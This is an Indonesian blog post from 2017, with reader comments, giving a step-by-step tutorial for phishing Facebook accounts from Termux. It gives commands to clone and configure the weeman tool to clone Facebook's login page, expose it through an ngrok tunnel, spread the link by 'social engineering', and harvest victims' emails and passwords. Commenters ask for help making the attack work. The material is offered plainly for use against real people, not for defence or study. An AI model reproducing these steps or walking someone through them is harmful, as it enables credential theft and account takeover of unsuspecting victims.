News Ticker

Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX

By Humanerror - Tuesday, December 19, 2017 20 Comments

Cara Hack Facebook Dengan Weeman dan Ngrok

Banyak sekali cara hack facebook dari tahun ke tahun .
Dari mulai methode Bruteforce hingga phising . 
Keberhasilan hack facebook dengan cara membobol password
menggunakan Bruteforce sangat lah kecil . Ya semua tergantung
dari wordlist mu. Cara yang paling efektif ialah menggunakan 
tekhnik phising . Kita hanya perlu membuat sebuah url login page
yg telah di modifikasi de beri log . Tapi itu membutuhkan hosting
dan domain . Kali ini saya akan memberi cara membuat phising
dengan lebih mudah . Mudah bahan maksudnya wkwkw . walaupun
agak sedikit ribet pada prosesnya .
Langsung saja ikuti tahapnya .

Gunakan VPN apa saja sebelum menggunakan ngrok . Agar ngrok tidak bermasalah
Kalian bisa cari vpn apa saja di playstore
lanjut ke tahap selanjutnya.

Clone Tools weeman dengan command:
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ python2 weeman.py

Nah sekarang atur tools pada weeman . ikuti command berikut:
weeman > set url http://m.facebook.com
weeman > set action_url http://m.facebook.com/login.php

Jika target anda menggunakan desktop . ubah url menjadi http://facebook.com
dan action_url http://facebook.com/login.php

Semua sudah di set langsung jalankan dengan command:
weeman > run


Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga
login menggunakan akun google dan github . 

Pilih download


Pilih Linux(ARM)



Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd storage/shared/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok
*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja
kebanyakan bernama ~/sdcard . Jika kalian belum setting storage . setting dengan command :
$ termux-setup-storage
dan berikan ijin untuk mengakses sdcard


Lalu kita buka kembali website ngrok . dan copy authtoken nya dan paste:


$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

Akan muncul seperti ini : 

Copy forwardingnya :

Sebarkan atau pancing menggunakan tipu muslihat mu . kalo bahasa kerennya Social Engineering wkwkwkw .
Mari kita test, apakah ini berjala  atau tidak .
Pastekan url forwarder dari ngrok tadi 
Coba test login oleh mu . 

Nah mulai lah cari email/username dan passwordnya 


Ketemu kan XD . sekian tutorial Cara Hack Facebook Dengan Weeman Dan Ngrok di Termux . Gunakanlah dengan bijak

20 comments to ''Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX"

ADD COMMENT
  1. Saya masih belum faham, gimana dri awal , Cara2 Nya yg perlu di install apa ajha terima kasih

    ReplyDelete
  2. Yg perlu di install apk apa ajha ya .. terima kasih

    ReplyDelete
  3. koq aq gk bisa??..akun FB aq gk bisa di ketahuim T_T....atw mungkin karena emailny udh di ganti?? apkah ngaruh tuh klo udh diganti yh?

    ReplyDelete
  4. Bang bleh mnta no wanya g bang soalnya pnya sya susah bgat...tolong dong bang

    ReplyDelete
  5. This comment has been removed by a blog administrator.

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. forwadingnya udah ane copy tapi ane test login halaman gak kebuka alias blank,

    ReplyDelete
  8. kalo di saya, orang lain sudah sampai bisa ngakses link phisingan kita, tapi ketikan orang yg login ga masuk di termux, cmn tulisan2 random gajelas

    ReplyDelete
  9. Pas pencek tombol masuk masa ga login login mas??

    ReplyDelete
  10. Bang boleh minta nomer wa nya gak?

    ReplyDelete
  11. This comment has been removed by a blog administrator.

    ReplyDelete
  12. Pastekan url forwarder nya kemana

    ReplyDelete
  13. buatin videonya dong min!!!
    biar lebih jelas.

    ReplyDelete